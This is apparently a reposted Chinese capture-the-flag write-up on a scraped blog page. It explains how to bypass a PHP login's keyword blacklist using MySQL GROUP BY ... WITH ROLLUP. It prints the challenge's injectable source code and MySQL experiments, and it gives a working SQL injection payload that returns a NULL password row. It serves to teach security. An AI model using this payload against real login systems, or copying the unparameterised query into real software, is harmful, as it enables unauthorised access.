程序博客网 > java实现base64解码

实验吧 因缺思汀的绕过 By Assassin(with rollup统计)

来源:互联网 发布:java实现base64解码 编辑:程序博客网 时间:2024/06/05 16:15

这个题目还是比较新鲜的,很久没回实验吧了学到了很多的姿势~不得不说不看提示真心想不到这些,嗯。

首先我们需要了解题目中php的工作原理,首先审源码得到了source.txt得到了源码,然后我们看一下源码干了什么,主要就是一个登陆认证!

<?phperror_reporting(0);if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {    echo '<form action="" method="post">'."<br/>";    echo '<input name="uname" type="text"/>'."<br/>";    echo '<input name="pwd" type="text"/>'."<br/>";    echo '<input type="submit" />'."<br/>";    echo '</form>'."<br/>";    echo '<!--source: source.txt-->'."<br/>";    die;}function AttackFilter($StrKey,$StrValue,$ArrReq){      if (is_array($StrValue)){        $StrValue=implode($StrValue);    }    if (preg_match("/".$ArrReq."/is",$StrValue)==1){           print "姘村彲杞借垷锛屼害鍙禌鑹囷紒";        exit();    }}$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";foreach($_POST as $key=>$value){     AttackFilter($key,$value,$filter);}$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");if (!$con){    die('Could not connect: ' . mysql_error());}$db="XXXXXX";mysql_select_db($db, $con);$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";$query = mysql_query($sql); if (mysql_num_rows($query) == 1) {     $key = mysql_fetch_array($query);    if($key['pwd'] == $_POST['pwd']) {        print "CTF{XXXXXX}";    }else{        print "浜﹀彲璧涜墖锛?";    }}else{    print "涓€棰楄禌鑹囷紒";}mysql_close($con);?>

可以看到主要是
$filter = “and|select|from|where|union|join|sleep|benchmark|,|(|)”;
这句话过滤了很多关键词,加上function AttackFilter这个函数起到了过滤的作用,这里是巧妙地用了select过程中​​用group by with rollup这个统计的方法进行插入查询。我们用mysql做几个小实验就明白这个是怎么用的了!

mysql> create table test (    -> user varchar(100) not null,    -> pwd varchar(100) not null);  mysql>insert into test values("admin","mypass");mysql>select * from test group by pwd with rollupmysql> select * from test group by pwd with rollup;+-------+------------+| user  | pwd        |+-------+------------+| guest | alsomypass || admin | mypass     || admin | NULL       |+-------+------------+3 rows in setmysql> select * from test group by pwd with rollup limit 1;+-------+------------+| user  | pwd        |+-------+------------+| guest | alsomypass |+-------+------------+mysql> select * from test group by pwd with rollup limit 1 offset 0;+-------+------------+| user  | pwd        |+-------+------------+| guest | alsomypass |+-------+------------+1 row in setmysql> select * from test group by pwd with rollup limit 1 offset 1;+-------+--------+| user  | pwd    |+-------+--------+| admin | mypass |+-------+--------+1 row in setmysql> select * from test group by pwd with rollup limit 1 offset 2;+-------+------+| user  | pwd  |+-------+------+| admin | NULL |+-------+------+1 row in set

哎,然后我们就看到关键了,这个查询的时候可以想办法
让pwd变成空,而且user这一列用的却是也是存在的字段!
这就很好用了!又有if (mysql_num_rows($query) == 1)知道只要一列

然后我们构造payload
’ or 1=1 group by pwd with rollup limit 1 offset XX#
然后一个试出来就行啦。涨姿势!
这是第二届北京网络安全技术大赛夺旗赛Writeup(Web安全篇)​的一个题目

0 1
java实现base64解码 java实现base64解码
原创粉丝点击
热门IT博客
java 获取本年第一天java 获取本年第一天
显卡驱动升级软件显卡驱动升级软件
数据库如何备份
云计算 微盘
软件项目管理书籍
淘宝女装优质标签卖家
alex卞正伟淘宝网店
node.js实战 第二季
51单片机数据手册
四象限法则 知乎
机构类顶级域名
贵州省旅游市场数据
淘宝我是商家怎么激活
js省市区三级联动插件
自学编程应该看什么书
centos 6.8 官方下载
网络暴力英语视频新闻
网络歌曲新打工谣
python安装包64位下载
dw for mac中文破解版
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 母亲歌 歌曲母亲 母亲歌曲 我和母亲 母亲2 母亲-韩国版 老母亲图片 母亲母亲演员表介绍 上了母亲 母亲 歌词 母亲是 母亲被 慈祥的母亲 父亲母亲 母亲阎维文 母亲 高尔基 母亲儿子 母亲作文 母亲英语 母亲冰心 母亲简谱 母亲诗歌 母亲散文 母亲英文 母亲的诗 母亲,母亲 母亲莫言 母亲高尔基 母亲作文600 母亲的作文 给母亲 母亲啊 母亲的悲哀 诉母亲 小母亲 好母亲 和母亲做 发现母亲 无奈的母亲 伟大的母亲 神秘的母亲

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里